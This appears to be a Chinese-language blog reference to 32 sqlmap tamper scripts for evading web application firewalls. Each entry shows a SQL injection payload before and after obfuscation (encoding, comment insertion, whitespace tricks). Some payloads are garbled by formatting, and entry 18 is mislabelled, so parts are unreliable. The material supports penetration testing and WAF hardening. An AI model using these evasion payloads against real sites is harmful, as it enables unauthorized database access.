sqlmap里面有一个参数–tamper=
而在sqlmap的安装目录下有一个tamper文件夹,里面全部是python脚本,都是用来绕过waf的脚本的

  1. apostrophemask.py
    适用数据库:ALL
    作用:将引号替换为utf-8,用于过滤单引号
    使用脚本前:tamper(“1 AND ‘1’='1”)
    使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

  2. base64encode.py
    适用数据库:ALL
    作用:替换为base64编码
    使用脚本前:tamper(“1’ AND SLEEP(5)#”)
    使用脚本后:MScgQU5EIFNMRUVQKDUpIw==

  3. multiplespaces.py
    适用数据库:ALL
    作用:围绕sql关键字添加多个空格
    使用脚本前:tamper(‘1 UNION SELECT admin’)
    使用脚本后:1 UNION SELECT admin

  4. space2plus.py
    适用数据库:ALL
    作用:用加号替换空格
    使用脚本前:tamper(‘SELECT id FROM users’)
    使用脚本后:SELECT+id+FROM+users

  5. nonrecursivereplacement.py
    适用数据库:ALL
    作用:作为双重查询语句,用双重语句替代预定义的sql关键字(适用于非常弱的自定义过滤器,例如将
    select替换为空)
    使用脚本前:tamper(‘1 UNION SELECT 2–+’)
    使用脚本后:1 UNIOUNIONN SELESELECTCT 2–+

  6. space2randomblank.py
    适用数据库:ALL
    作用:将空格替换为其他有效字符(绕过空格)
    使用脚本前:tamper(‘SELECT id FROM users’)
    使用脚本后:SELECT%0Did%0DFROM%0Ausers

  7. unionalltounion.py
    适用数据库:ALL
    作用:将union all select 替换为unionselect
    使用脚本前:tamper(’-1 UNION ALL SELECT’)
    使用脚本后:-1 UNION SELECT

  8. securesphere.py
    适用数据库:ALL
    作用:追加特定的字符串
    使用脚本前:tamper(‘1 AND 1=1’)
    使用脚本后:1 AND 1=1 and ‘having’=‘having’

  9. space2dash.py
    适用数据库:ALL
    作用:将空格替换为–,并添加一个随机字符串和换行符
    使用脚本前:tamper(‘1 AND 9227=9227’)
    使用脚本后:1–nVNaVoPYeva%0AAND–ngNvzqu%0A9227=9227

  10. space2mssqlblank.py
    适用数据库:Microsoft SQL Server
    测试通过数据库:Microsoft SQL Server 2000、Microsoft SQL Server 2005
    作用:将空格随机替换为其他空格符号(’%01’, ‘%02’, ‘%03’, ‘%04’, ‘%05’, ‘%06’, ‘%07’,
    ‘%08’, ‘%09’, ‘%0B’, ‘%0C’, ‘%0D’, ‘%0E’, ‘%0F’, ‘%0A’)
    使用脚本前:tamper(‘SELECT id FROM users’)
    使用脚本后:SELECT%0Eid%0DFROM%07users

  11. percentage.py
    适用数据库:ASP
    测试通过数据库:Microsoft SQL Server 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL
    9.0
    作用:在每个字符前添加一个%
    使用脚本前:tamper(‘SELECT FIELD FROM TABLE’)
    使用脚本后:%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

  12. sp_password.py
    适用数据库:MSSQL
    作用:从T-SQL日志的自动迷糊处理的有效载荷中追加sp_password
    使用脚本前:tamper('1 AND 9227=9227-- ')
    使用脚本后:1 AND 9227=9227-- sp_password

  13. charencode.py
    测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、
    PostgreSQL 8.3, 8.4, 9.0
    作用:对给定的payload全部字符使用url编码(不处理已经编码的字符)
    使用脚本前:tamper(‘SELECT FIELD FROM%20TABLE’)
    使用脚本后:%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

  14. randomcase.py
    测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、
    PostgreSQL 8.3, 8.4, 9.0
    作用:随机大小写
    使用脚本前:tamper(‘INSERT’)
    使用脚本后:INseRt

  15. charunicodeencode.py
    适用数据库:ASP、ASP.NET
    测试通过数据库:Microsoft SQL Server 2000/2005、MySQL 5.1.56、PostgreSQL 9.0.3
    作用:适用字符串的unicode编码
    使用脚本前:tamper(‘SELECT FIELD%20FROM TABLE’)
    使用脚本后:
    %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u
    0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

  16. space2comment.py
    测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
    作用:将空格替换为 /* */
    使用脚本前:tamper(‘SELECT id FROM users’)
    使用脚本后:SELECT//id //FROM/**/users

  17. equaltolike.py
    测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5
    作用:将=替换为LIKE
    使用脚本前:tamper(‘SELECT * FROM users WHERE id=1’)
    使用脚本后:SELECT * FROM users WHERE id LIKE 1

  18. equaltolike.py
    测试通过数据库:MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
    作用:将>替换为GREATEST,绕过对>的过滤
    使用脚本前:tamper(‘1 AND A > B’)
    使用脚本后:1 AND GREATEST(A,B+1)=A

  19. ifnull2ifisnull.py
    适用数据库:MySQL、SQLite (possibly)、SAP MaxDB (possibly)
    测试通过数据库:MySQL 5.0 and 5.5
    作用:将类似于IFNULL(A, B)替换为IF(ISNULL(A), B, A),绕过对IFNULL的过滤
    使用脚本前:tamper(‘IFNULL(1, 2)’)
    使用脚本后:IF(ISNULL(1),2,1)

  20. modsecurityversioned.py
    适用数据库:MySQL
    测试通过数据库:MySQL 5.0
    作用:过滤空格,使用mysql内联注释的方式进行注入
    使用脚本前:tamper(‘1 AND 2>1–’)
    使用脚本后:1 /!30874AND 2>1/–

  21. space2mysqlblank.py
    适用数据库:MySQL
    测试通过数据库:MySQL 5.1
    作用:将空格替换为其他空格符号(’%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’)
    使用脚本前:tamper(‘SELECT id FROM users’)
    使用脚本后:SELECT%0Bid%0DFROM%0Cusers

  22. modsecurityzeroversioned.py
    适用数据库:MySQL
    测试通过数据库:MySQL 5.0
    作用:使用内联注释方式(/!00000/)进行注入
    使用脚本前:tamper(‘1 AND 2>1–’)
    使用脚本后:1 /!00000AND 2>1/–

  23. space2mysqldash.py
    适用数据库:MySQL、MSSQL
    作用:将空格替换为 – ,并追随一个换行符
    使用脚本前:tamper(‘1 AND 9227=9227’)
    使用脚本后:1–%0AAND–%0A9227=9227

  24. bluecoat.py
    适用数据库:Blue Coat SGOS
    测试通过数据库:MySQL 5.1,、SGOS
    作用:在sql语句之后用有效的随机空白字符替换空格符,随后用LIKE替换=
    使用脚本前:tamper(‘SELECT id FROM users where id = 1’)
    使用脚本后:SELECT%09id FROM users where id LIKE 1

  25. versionedkeywords.py
    适用数据库:MySQL
    测试通过数据库:MySQL 4.0.18, 5.1.56, 5.5.11
    作用:注释绕过
    使用脚本前:tamper(‘1 UNION ALL SELECT NULL, NULL,
    CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS
    CHAR),CHAR(32)),CHAR(58,100,114,117,58))#’)
    使用脚本后:1/!UNION//!ALL//!SELECT//!NULL/,/!NULL/,
    CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/!AS//!CHAR/),CHAR(
    32)),CHAR(58,100,114,117,58))#

  26. halfversionedmorekeywords.py
    适用数据库:MySQL < 5.1
    测试通过数据库:MySQL 4.0.18/5.0.22
    作用:在每个关键字前添加mysql版本注释
    使用脚本前:tamper(“value’ UNION ALL SELECT
    CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS
    CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa”)
    使用脚本后:
    value’/!0UNION/!0ALL/!0SELECT/!0CONCAT(/!0CHAR(58,107,112,113,58),/!0IFNUL
    L(CAST(/!0CURRENT_USER()/!0AS/!0CHAR),/!0CHAR(32)),/!0CHAR(58,97,110,121,58
    )),/!0NULL,/!0NULL#/!0AND ‘QDWa’='QDWa

  27. space2morehash.py
    适用数据库:MySQL >= 5.1.13
    测试通过数据库:MySQL 5.1.41
    作用:将空格替换为#,并添加一个随机字符串和换行符
    使用脚本前:tamper(‘1 AND 9227=9227’)
    使用脚本后:1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227

  28. apostrophenullencode.py
    适用数据库:ALL
    作用:用非法双字节Unicode字符替换单引号
    使用脚本前:tamper(“1 AND ‘1’='1”)
    使用脚本后:1 AND %00%271%00%27=%00%271

  29. appendnullbyte.py
    适用数据库:ALL
    作用:在有效载荷的结束位置加载null字节字符编码
    使用脚本前:tamper(‘1 AND 1=1’)
    使用脚本后:1 AND 1=1%00

  30. chardoubleencode.py
    适用数据库:ALL
    作用:对给定的payload全部字符使用双重url编码(不处理已经编码的字符)
    使用脚本前:tamper(‘SELECT FIELD FROM%20TABLE’)
    使用脚本后:%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F
    %254D%2520%2554%2541%2542%254C%2545

  31. unmagicquotes.py
    适用数据库:ALL
    作用:用一个多字节组合%bf%27和末尾通用注释一起替换空格
    使用脚本前:tamper(“1’ AND 1=1”)
    使用脚本后:1%bf%27 AND 1=1–

  32. randomcomments.py
    适用数据库:ALL
    作用:用注释符分割sql关键字
    使用脚本前:tamper(‘INSERT’)
    使用脚本后:I/**/N/* */SERT

sqlmap绕过waf的脚本介绍(tamper脚本介绍)相关推荐

  1. 渗透测试-sqlmap绕过WAF脚本编写

    sqlmap绕过WAF脚本编写 文章目录 sqlmap绕过WAF脚本编写 前言 一.什么是sqlmap和tamper脚本 二.利用sqlmap脚本进行扫描获取数据库信息 1.编写sqlmap绕过WAF ...

  2. 【Web安全】实战sqlmap绕过WAF

    前言 随着最近几年安全行业的兴起,市场关注度的不断提升,安全防护的软件也在不断提升,不在是那个随便找一个站就能马上发现漏洞了,没有以前那么多所谓的"靶场"了,在这次的实战中遇到的S ...

  3. 实战sqlmap绕过WAF

    本文转载于https://xz.aliyun.com/t/10385 实战演示 通过前期的信息收集发现存在注入的页面如下: 直接使用sqlmap跑发现出现如下错误: python2 sqlmap.py ...

  4. 第19篇:WEB漏洞~SQL注入~SqlMap绕过WAF

    目录 1. 本文 2. 示例 2.1. 简要其他绕过方式学习 2.1.1. IP 白名单 2.1.2. 静态资源 2.1.3. url 白名单 2.1.4. 爬虫白名单 2.2. FUZZ绕过脚本结合 ...

  5. B站小迪安全笔记第十九天-SQL注入之sqlmap绕过waf

    前言: 在攻防实战中,往往需要掌握一些特性,比如服务器.数据库.应用层.WAF层等,以便我们更灵活地去构造 Payload,从而可以和各种 WAF 进行对抗,甚至绕过安全防御措施进行漏洞利用. 演示案 ...

  6. sqlmap之tamper脚本编写

    目录 前言 tamper脚本实战 前言 sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf. 为了说明ta ...

  7. 绕过WAF的XSS语句

    吐血整理转载请说明. 原文收集于OWASP XSS_Filter_Evasion_Cheat_Sheet 正文: XSS JavaScript injection: <SCRIPT SRC=ht ...

  8. sqlmap tamper脚本编写

    0x00 sqlmap tamper简介 sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf. 0x01 ...

  9. mysql常用的tamper脚本_总结一些sqlmap的常用tamper脚本释义

    要想成为一名合格的"脚本小子",我们首先需要一个强大的工具,然后利用好他的脚本.但是脚本也不能乱用,首先就是要了解一下SqlMap的常用的脚本,然后分清楚场合进行利用.(好的,看开 ...

  10. sqlmap之tamper脚本

    sqlmap之tamper脚本 进行注入时,往往会遇到服务端主机装有 WAF(Web Application Firewall)对 Payload 进行过滤的情况,这使得注入攻击无法成功实施.但 WA ...

最新文章

  1. windows连接linux系统telnet端口23无法连接的问题
  2. 网易举办首届云创大会,优云软件助力司南战略
  3. python编程中文版百度百科_1.2 搭建python+pycharm编程开发环境
  4. matlab支持的文件类型,MATLAB可以读取的数据文件类型有()
  5. 国家卫健委:我国男女性成人平均身高分别为169.7厘米和158厘米
  6. Oracle 常用命令
  7. Qt程序打包发布方法(使用官方提供的windeployqt工具)
  8. centos7 git安装
  9. JSP tomcat 更新不生效
  10. Flutter文本输入框TextField控制器TextEditingController,TextField预设内容,获取TextField中的输入内容,兼听TextField中的内容变化
  11. linux软raid 系统坏了,LINUX下软RAID的制造及如何查看坏盘?
  12. 学python前端需要哪些基础知识_简析前端学习python3的基础
  13. Vscode快捷键整理
  14. CEF3研究(四)之javascript集成
  15. 玩转基金(2)购买基金
  16. android 7使用litepal,android数据库litepal使用记录
  17. 非华为电脑实现多屏协同、一碰传
  18. 步态分析——信度以及效度
  19. Win10隐藏文件资源管理器中的我的电脑上方的7个文件夹
  20. 骏文c语言银行系统,C语言学生选课管理系统

热门文章

  1. 软路由防火墙IPcop的安装,配置
  2. 厘米换算英尺英寸(C语言程序设计)
  3. 【解决使用webpack自动打包功能 ,报错 Content not from webpack is served from ‘ ‘ 且访问http://localhost:8080/ 为空 问题 】
  4. 【bzoj1984】【坑】月下“毛景树” 树链剖分
  5. 吉他音阶训练入门教程——问题解答(一)
  6. FastReport.Net 常用功能总汇
  7. 笔记本电脑频繁自动重启_笔记本电脑总是自动重启怎么回事
  8. CorelDRAW 软件工具使用详解
  9. 英文邮件开场白(Dear / Hi / TO)
  10. 学习java能干什么?学习java能做哪些工作?